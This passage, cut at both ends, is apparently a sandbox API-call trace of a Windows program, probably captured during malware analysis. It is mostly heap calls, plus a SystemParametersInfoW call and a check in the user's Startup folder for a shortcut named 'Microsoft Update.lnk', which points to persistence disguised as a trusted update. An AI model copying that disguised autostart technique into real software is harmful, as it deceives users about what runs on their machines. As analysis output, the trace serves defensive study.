Flags=0x0, Size=0x4) returned 0x24b2ba8 [0304.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0304.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0304.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0304.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0304.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0304.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0304.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0304.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0304.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0304.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0304.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0304.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0304.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0304.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0304.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0304.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0304.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0304.255] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0304.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0304.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0304.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0304.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0304.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0304.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0304.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0304.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0304.256] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0304.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0304.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0304.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0304.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0304.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0304.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0304.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0304.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0304.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0304.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0304.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0304.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0304.257] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0304.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0304.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0304.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0304.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0304.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0304.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0304.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0304.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0304.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0304.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0304.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0304.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0304.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0304.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0304.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0304.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0304.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0304.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0304.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0304.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0304.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0304.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0304.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0304.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0304.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0304.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0304.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0304.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0304.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0304.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0304.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0304.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0304.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0304.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0304.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0304.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0304.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0304.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0304.387] FreeLibrary (hLibModule=0x74f40000) returned 1 [0304.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0304.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0304.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0304.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0304.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0304.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0304.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0304.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0304.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0304.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0304.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0304.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0304.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0304.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0304.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0304.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0304.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0304.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0304.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0304.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0304.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0304.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0304.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0304.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0304.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0304.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0304.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0304.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0304.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0304.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0304.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0304.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0304.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0304.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0304.399] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0304.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0304.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0304.399] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0304.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0304.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0304.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0304.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0304.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0304.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0304.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0304.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0304.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0304.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0304.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0304.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0304.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0304.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0304.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0304.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0304.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0304.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0304.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0304.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0304.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0304.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0304.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0304.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0304.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0304.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0304.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0304.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0304.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0304.402] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0304.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0304.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0304.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0304.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0304.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0304.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0304.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0304.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0304.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0304.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0304.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0304.403] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0304.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0304.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0304.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0304.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0304.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0304.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0304.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0304.403] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0304.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0304.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0304.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0304.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0304.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0304.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0304.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0304.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0304.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0304.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0304.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0304.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0304.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0304.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0304.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0304.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0304.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0304.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0304.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0304.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0304.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0304.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0304.405] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0304.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0304.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0304.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0304.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0304.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0304.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0304.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0304.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0304.405] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0304.405] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0304.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0304.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0304.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 